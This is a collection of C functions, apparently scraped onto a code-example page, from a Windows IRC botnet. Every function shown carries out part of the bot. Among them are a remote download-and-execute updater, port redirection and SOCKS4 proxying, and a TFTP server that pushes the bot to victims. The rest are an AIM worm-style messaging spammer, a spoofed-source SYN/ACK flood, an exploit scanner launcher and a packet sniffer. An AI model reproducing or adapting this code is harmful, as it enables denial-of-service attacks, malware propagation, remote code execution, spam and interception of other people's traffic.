		// download is an update
		}
		else if (dl.bdata1)
		{
			PROCESS_INFORMATION pinfo;
			STARTUPINFO sinfo;
			ZeroMemory(&pinfo, sizeof(PROCESS_INFORMATION));
			ZeroMemory(&sinfo, sizeof(STARTUPINFO));
			sinfo.cb = sizeof(sinfo);
			sinfo.wShowWindow = SW_HIDE;
			if (CreateProcess(NULL, dlto, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS|DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE)
			{
				uninstall(TRUE,(dl.idata1==1?TRUE:FALSE));
				irc->quit(str_quit_upd);
				Sleep(FLOOD_DELAY);
				irc->disconnect();
				fWSACleanup();
				ExitProcess(EXIT_SUCCESS);
			}
			else
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Update failed: Error executing file: %s.",update_title,dlto);
			}
		}
	}
	else
	{
		if (!dl.silent)
			irc->pmsg(dl.target,"%s Bad URL or DNS Error, error: <%d>",(dl.bdata1?update_title:download_title),GetLastError());
	}
	clearthread(dl.threadnum);
	ExitThread(0);

		return 0;
}
Ejemplo n.º 11
0
// part of the redirect function, handles sending/recieving for the remote connection.
DWORD WINAPI RedirectLoopThread(LPVOID param)
{
	REDIRECT redirect = *((REDIRECT *)param);
	REDIRECT *redirectp = (REDIRECT *)param;
	redirectp->gotinfo = TRUE;

	int threadnum=redirect.cthreadnum;

	char sendbuf[IRCLINE], buff[4096];
	int err;
	DWORD id;
	
	SOCKET ssock;
	do {
		if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break;

		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons((unsigned short)redirect.port);

		IN_ADDR iaddr;
		iaddr.s_addr = finet_addr(redirect.dest);
		LPHOSTENT hostent;
		if (iaddr.s_addr == INADDR_NONE) 
			hostent = fgethostbyname(redirect.dest);
		else 
			hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET);
		if (hostent == NULL) break;
		ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list);
	
		if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break;

		redirect.cgotinfo = FALSE;
		sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum); 
		redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock);
		threads[redirect.cthreadnum].parent = redirect.threadnum;
		threads[redirect.cthreadnum].csock = threads[threadnum].sock;
		if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) {
			while (redirect.cgotinfo == FALSE) 
				Sleep(50);
		} else {
			addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError());
			break;
		}

		while (1) {
			memset(buff, 0, sizeof(buff));
			if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break;
			if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break;
		}
		break;
	} while (1);

	fclosesocket(threads[threadnum].sock);
	fclosesocket(ssock);

	clearthread(threadnum);

	ExitThread(0);
}
Ejemplo n.º 12
0
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	DOWNLOAD dl = *((DOWNLOAD *)param);
	DOWNLOAD *dls = (DOWNLOAD *)param;
	dls->gotinfo = true;

	HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
	if (fh != NULL) {
		// open the file
		HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// make sure that our file handle is valid
		if (f < (HANDLE)1) {
			sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
			if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
			addlog(buffer);

			clearthread(dl.threadnum);

			ExitThread(EXIT_FAILURE);
		}

		total = 0;
		start = GetTickCount();

		char *fileTotBuff=(char *)malloc(512000);	//FIX ME: Only checks first 500 kb
		do {
			memset(buffer, 0, sizeof(buffer));
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			if (dl.encrypted)
				Xorbuff(buffer,r);
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000) {
				//We have free bytes...
				//512000-total
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
			if (dl.filelen) 
				if (total>dl.filelen) 
					break; //er, we have a problem... filesize is too big.
			if (dl.update != 1) 
				sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: File download: %s (%dKB transferred).", dl.url, total / 1024);
			else 
				sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: Update: %s (%dKB transferred).", dl.url, total / 1024);
		} while (r > 0);

		bool goodfile=true;

		if (dl.filelen) {
			if (total!=dl.filelen) {
				goodfile=false;
				sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
				irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
				addlog(buffer);
			}
		}
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		CloseHandle(f);

		/* if (dl.expectedcrc) {
			unsigned long crc,crclength;
			sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
			crclength=total;
			if (crclength>512000) crclength=512000;
			crc=crc32(fileTotBuff,crclength);
			if (crc!=dl.expectedcrc) {
				goodfile=false;
				irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
			}
			
		} */
		free(fileTotBuff);
		
		if (dl.expectedcrc) { 
			unsigned long crc=crc32f(dl.dest); 
			if (crc!=dl.expectedcrc) { 
				goodfile=false;
				sprintf(buffer,"[DOWNLOAD]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
				irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); 
				addlog(buffer);
			} 
		} 

		if (goodfile==false) 
			goto badfile;
		
		//download isn't an update
		if (dl.update != 1) {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			if (dl.run == 1) {
				CreateProc(dl.dest,NULL,SW_SHOW);
				if (!dl.silent) {
					sprintf(buffer,"[DOWNLOAD]: Opened: %s.",dl.dest);
					irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
					addlog(buffer);
				}
			}

		// download is an update
		} else {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			if (CreateProc(dl.dest,NULL,SW_HIDE) != 0) {
				fWSACleanup();
				uninstall();
				ExitProcess(EXIT_SUCCESS);
			} else {
				sprintf(buffer,"[DOWNLOAD]: Update failed: Error executing file: %s.",dl.dest);
				if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
				addlog(buffer);
			}
		}
	} else {
		sprintf(buffer,"[DOWNLOAD]: Bad URL, or DNS Error: %s.",dl.url);
		if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
		addlog(buffer);
	}

badfile:
	fInternetCloseHandle(fh);

	clearthread(dl.threadnum);

	ExitThread(EXIT_SUCCESS);
}
Ejemplo n.º 13
0
DWORD WINAPI VisitThread(LPVOID param)
{
	HINTERNET ch = 0, req = 0;

	const char *accept = "*/*";
	char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];

	NTHREAD visit = *((NTHREAD *)param);
	NTHREAD *visits = (NTHREAD *)param;
	IRC* irc=(IRC*)visit.conn;
	visits->gotinfo = TRUE;

	// zero out string varaiables
	memset(vhost, 0, sizeof(vhost));
	memset(vuser, 0, sizeof(vuser));
	memset(vpass, 0, sizeof(vpass));
	memset(vpath, 0, sizeof(vpath));

	// zero out url structure and set options
	URL_COMPONENTS url;
	memset(&url, 0, sizeof(url));
	url.dwStructSize = sizeof(url);
	url.dwHostNameLength = 1;
    url.dwUserNameLength = 1;
    url.dwPasswordLength = 1;
    url.dwUrlPathLength = 1;

	do {
		// crack the url (break it into its main parts)
		if (!fInternetCrackUrl(visit.data1, strlen(visit.data1), 0, &url)) {
			sprintf(sendbuf,"%s Invalid URL.", visit_title);
			break;
		}

		// copy url parts into variables
		if (url.dwHostNameLength > 0) 
			strncpy(vhost, url.lpszHostName, url.dwHostNameLength);

		int vport = url.nPort;
		if (url.dwUserNameLength > 0) 
			strncpy(vuser, url.lpszUserName, url.dwUserNameLength);

		if (url.dwPasswordLength > 0) 
			strncpy(vpass, url.lpszPassword, url.dwPasswordLength);

		if (url.dwUrlPathLength > 0) 
			strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);


		ch = fInternetConnect(ih, vhost,(unsigned short)vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
		if (ch == NULL) {
			sprintf(sendbuf,"%s Could not open a connection.", visit_title);
			break;
		}

		req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.data2, &accept, INTERNET_FLAG_NO_UI, 0);
		if (req == NULL) {
			sprintf(sendbuf,"%s Failed to connect to HTTP server.", visit_title);
			break;
		}

		if (fHttpSendRequest(req, NULL, 0, NULL, 0))
			sprintf(sendbuf,"%s URL visited.", visit_title);
		else
			sprintf(sendbuf,"%s Failed to get requested URL from HTTP server.", visit_title);		
	} while(0);

	if (!visit.silent) irc->pmsg(visit.target,sendbuf);

	fInternetCloseHandle(ch);
	fInternetCloseHandle(req);

	clearthread(visit.threadnum);

	ExitThread(0);

	return 0;
}
Ejemplo n.º 14
0
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
	SOCKS4 socks4 = *((SOCKS4 *)param);
	SOCKS4 *socks4p = (SOCKS4 *)param;
	socks4p->cgotinfo = TRUE;

	int threadnum = socks4.cthreadnum;

	SOCKS4HEADER hdr;

	TIMEVAL timeout;
	timeout.tv_sec = 5;
	timeout.tv_usec = 0;
	fd_set fd;
	FD_ZERO(&fd);
	FD_SET(threads[threadnum].sock, &fd);

	if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}
	if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);		
		ExitThread(0);
	}
	if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}

	// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
	if (socks4.userid[0] != '\0') {
		if (strcmp(hdr.userid, socks4.userid) != 0) {
			addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
	
			hdr.vn = 0;
			hdr.cd = SOCKS4_REJECT_USERID;
			memset(&hdr.userid, 0, 1024);
			fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

			fclosesocket(threads[threadnum].sock);
			clearthread(threadnum);

			ExitThread(0);
		}
	}

	SOCKADDR_IN tsin;
	memset(&tsin, 0, sizeof(tsin));
	tsin.sin_family = AF_INET;
	tsin.sin_port = hdr.destport;
	tsin.sin_addr.s_addr = hdr.destaddr;

	SOCKET tsock;
	if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
		addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());

		hdr.vn = 0;
		hdr.cd = SOCKS4_REJECT;
		memset(&hdr.userid, 0, 1024);
		fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
	
		ExitThread(0);
	}

	if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
		addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());

		hdr.vn = 0;
		hdr.cd = SOCKS4_REJECT;
		memset(&hdr.userid, 0, 1024);
		fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);

		ExitThread(0);
	}

	hdr.vn = 0;
	hdr.cd = SOCKS4_GRANT;
	memset(&hdr.userid, 0, 1024);
	fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
	TransferLoop(tsock, threads[threadnum].sock);

	fclosesocket(tsock);
	fclosesocket(threads[threadnum].sock);
	clearthread(threadnum);

	ExitThread(0);
}
Ejemplo n.º 15
0
DWORD WINAPI tftpserver(LPVOID param) 
{ 
	FILE *fp;

	char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
	int err=1; 

	TFTP tftp = *((TFTP *)param);
	TFTP *tftps = (TFTP *)param;
	tftps->gotinfo = TRUE;
	tftp.threads++; 

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
		Sleep(400);
		sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
		addlog(sendbuf);

		clearthread(tftp.threadnum);

		ExitThread(0);
	}
	threads[tftp.threadnum].sock=ssock;

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET; 
	ssin.sin_port = fhtons((unsigned short)tftp.port); 
	ssin.sin_addr.s_addr = INADDR_ANY; 

	if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) { 
		Sleep(5000); 
		tftp.threads--; 

		return tftpserver(param); 
	} 

	if ((fp=fopen(tftp.filename, "rb")) == NULL) {
		Sleep(400);
		sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
		irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
		addlog(sendbuf);

		clearthread(tftp.threadnum);

		ExitThread(0);
	}

	while(err>0 && tftps->gotinfo && fp) { 
		TIMEVAL timeout; 
		timeout.tv_sec=5; 
		timeout.tv_usec=5000; 

		fd_set fd; 
		FD_ZERO(&fd); 
		FD_SET(ssock,&fd); 

		memset(buffer,0,sizeof(buffer)); 
		if(fselect(0,&fd,NULL,NULL,&timeout) > 0) { 
			SOCKADDR_IN csin;
			int csin_len=sizeof(csin); 
			char f_buffer[BLOCKSIZE+4]=""; 
			
			err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len); 
			sprintf(IP,finet_ntoa(csin.sin_addr));
        
			// parse buffer
			if(buffer[0]==0 && buffer[1]==1) { //RRQ
				char *tmprequest=buffer,*tmptype=buffer;
				tmprequest+=2; //skip the opcode
				tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
				if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) { 
					fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
					// for loop to add a \0 to the end of the requestname
					sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
					addlog(buffer);
				} else { // good rrq packet send first data packet 
					fseek(fp, 0, SEEK_SET); 
					f_buffer[0]=0; f_buffer[1]=3; // DATA
					f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
					err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); 
					fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);

					//sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
					if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
					addlog(sendbuf);
				} 
			} else if(buffer[0]==0 && buffer[1]==4) { // ACK 
				// send next packet 
				unsigned int blocks; 
				BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #

				f_buffer[0]=0; f_buffer[1]=3;	// DATA
				if (b2==255) {					// DATA BLOCK #
					f_buffer[2]=++b1;
					f_buffer[3]=b2=0;
				} else {
					f_buffer[2]=b1;
					f_buffer[3]=++b2;
				}

				blocks=(b1 * 256) + b2 - 1; 
				// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
				fseek(fp, blocks * BLOCKSIZE, SEEK_SET); 
				err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); 
				fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
				if (err==0) {
					sprintf(sendbuf,"[TFTP]: I just owned: %s (%s).",IP,tftp.filename);
					if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
					addlog(sendbuf);
				}
			} else { // we dont support any other commands 
				fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len); 
			} 
		} else 
			continue;
	} 
	// check for ack, then msg irc on transfer complete

	fclosesocket(ssock); 
	fclose(fp); 

	tftp.threads--; 
	if(tftps->gotinfo == FALSE) {
		clearthread(tftp.threadnum);

		ExitThread(0); 
	}
	Sleep(1000);
   
	return tftpserver(param); 
}
Ejemplo n.º 16
0
//void TritonMessage(char* szMsg, unsigned int iDelay)
DWORD WINAPI TritonMessage(LPVOID param)
{
	NTHREAD tim = *((NTHREAD *)param);
	NTHREAD *tims = (NTHREAD *)param;
	tims->gotinfo = TRUE;
	IRC* irc=(IRC*)tim.conn;

	char szMsg[512];
	strncpy(szMsg,tim.data1,sizeof(szMsg));
	bool bDone = false;
	char szWindowText[256], szLastBuddy[256];
	ZeroMemory(&szLastBuddy, 256);
	HWND hTray = FindWindow("imAppSystemTrayHandler", "imApp"), hBuddyList = NULL, hKill = NULL;
	if(IsWindow(hTray))
	{
		SendMessage(hTray, 0x0065, 0x00000141, 0x00000203);
		do {
			hBuddyList = FindWindow("__oxFrame.class__", "AIM");
		} while(!IsWindow(hBuddyList));
		do {
			hKill = FindWindowEx(NULL, hKill, "__oxFrame.class__", NULL);
			ZeroMemory(&szWindowText, 256);
			GetWindowText(hKill, szWindowText, 256);
			if(strcmp(szWindowText, "AIM") != 0)
				SendMessage(hKill, WM_CLOSE, 0, 0);
		} while(IsWindow(hKill));
		TritonSetupList(hBuddyList, false);
		while(!bDone)
		{
			Sleep(3000);
			FocusWindow(hBuddyList);
 			SysKey(hBuddyList, VK_DOWN, 1);
 			SysKey(hBuddyList, VK_RETURN, 1);
			HWND hWindow = NULL;
			do {
				hWindow = FindWindowEx(NULL, hWindow, "__oxFrame.class__", NULL);
				if(IsWindow(hWindow))
				{
					ZeroMemory(&szWindowText, 256);
					GetWindowText(hWindow, szWindowText, 256);
					if((strcmp(szWindowText, " IMs") == 0) ||
						(strstr(szWindowText, "IM with ") != NULL))
					{
						if(strcmp(szLastBuddy, szWindowText) == 0)
							bDone = true;
						else {
							strncpy(szLastBuddy, szWindowText, 256);
							FocusWindow(hWindow);
							TritonIm(hWindow, szMsg);
						}
						SendMessage(hWindow, WM_CLOSE, 0, 0);
					}
				}
			} while(IsWindow(hWindow));
		}
 		TritonSetupList(hBuddyList, true);
	}
	clearthread(tim.threadnum);
	ExitThread(0);

	return 0;
}
Ejemplo n.º 17
0
DWORD WINAPI TcpFloodThread(LPVOID param) 
{
	TCPFLOOD tcpflood = *((TCPFLOOD *)param);
	TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
	tcpfloods->gotinfo = TRUE;

	char sendbuf[IRCLINE], szSendBuf[60]={0};

	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 

	srand(GetTickCount());

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
		sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}
	
	BOOL flag = TRUE; 
	if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { 
		sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	} 

	if (finet_addr(tcpflood.ip) == INADDR_NONE) {
		sprintf(sendbuf,"[TCP]: Invalid target IP.");
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));	
	ssin.sin_family=AF_INET; 
	ssin.sin_port=fhtons(0); 
	ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); 

	int sent = 0;
	unsigned long start = GetTickCount();

	while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
		ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
		ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); 
		ipHeader.ident=1; 
		ipHeader.frag_and_flags=0; 
		ipHeader.ttl=128; 
		ipHeader.proto=IPPROTO_TCP; 
		ipHeader.checksum=0; 
		ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
		ipHeader.destIP=ssin.sin_addr.s_addr;
		
		((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons((unsigned short)tcpflood.port))); 
		tcpHeader.sport=fhtons((unsigned short)(rand()%1025));  
		tcpHeader.seq=fhtonl(0x12345678); 
		if (strstr(tcpflood.type,"syn")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=SYN;
		} else if (strstr(tcpflood.type,"ack")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=ACK;
		} else if (strstr(tcpflood.type,"random")) {
			tcpHeader.ack_seq=rand()%3;
			((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
		}
		tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
		tcpHeader.window=fhtons(512); 
		tcpHeader.urg_ptr=0; 
		tcpHeader.checksum=0;
		
		psdHeader.saddr=ipHeader.sourceIP; 
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); 

		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); 
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 

		if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { 
			fclosesocket(ssock);

			_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
			if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
			addlog(sendbuf);

			clearthread(tcpflood.threadnum);

			ExitThread(0);
		}
		sent++;
	}
	fclosesocket(ssock);

	sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
	if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
	addlog(sendbuf);

	clearthread(tcpflood.threadnum);

	ExitThread(0); 
}
Ejemplo n.º 18
0
DWORD WINAPI AdvScanner(LPVOID param)
{
	char buffer[LOGLINE];
	//char szSelfExe[MAX_PATH];

	ADVSCAN scan = *((ADVSCAN *)param);
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->gotinfo = TRUE;
	advinfo[scan.threadnum].ip = finet_addr(scan.ip);

	CheckServers(scan);

	if (findthreadid(SCAN_THREAD) == 1) {
		DeleteCriticalSection(&CriticalSection); // just in case

		if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
			// failed to initialize CriticalSection
			sprintf(buffer,"scan -- Failed to initialize critical section.");
			if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
			addlog(buffer);

			return 0;
		}
	}

	advinfo[scan.threadnum].info = TRUE;
	for (unsigned int i=1;i<=(scan.threads);i++) {
		scan.cthreadid = i;
		sprintf(buffer,"scan -- %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
		scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
		threads[scan.cthreadnum].parent = scan.threadnum;
		if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
			while (scan.cgotinfo == FALSE)
				Sleep(30);
		} else {
			sprintf(buffer, "scan -- Failed to start worker thread, error: <%d>.", GetLastError());
			addlog(buffer);
		}

		Sleep(30);
	}

	if (scan.minutes != 0)
		Sleep(60000*scan.minutes);
	else
		while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);

	IN_ADDR in;
	in.s_addr = advinfo[scan.threadnum].ip;
	sprintf(buffer,"scan -- Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
	if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
	addlog(buffer);

	advinfo[scan.threadnum].info = FALSE;
	Sleep(3000);

	if (findthreadid(SCAN_THREAD) == 1)
		DeleteCriticalSection(&CriticalSection);

	clearthread(scan.threadnum);

	ExitThread(0);
}
Ejemplo n.º 19
0
DWORD WINAPI SnifferThread(LPVOID param) { 
   SNIFFER sniff = *((SNIFFER *)param); 
   SNIFFER *sniffs = (SNIFFER *)param; 
   sniffs->gotinfo = TRUE; 

   char sendbuf[IRCLINE]; 
   int sock; sockaddr_in addr_in; hostent *hEnt; 
   IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; 
   char szName[255]={0}; unsigned long lLocalIp; 
   addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; 
   fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); 
   memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); 
   addr_in.sin_addr.s_addr=lLocalIp; 

   sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); 

   if(sock==INVALID_SOCKET) return NULL; 
   if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   int optval=1; DWORD dwBytesRet; 
   if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) 
   { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; 

   while(1) 
   { 
      // Clear the buffer 
      memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; 

      // Read the raw packet 
      iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); 

      // Process if its a TCP/IP packet 
      if(ipHeader->proto==6) 
      {   tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); 
         int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; 
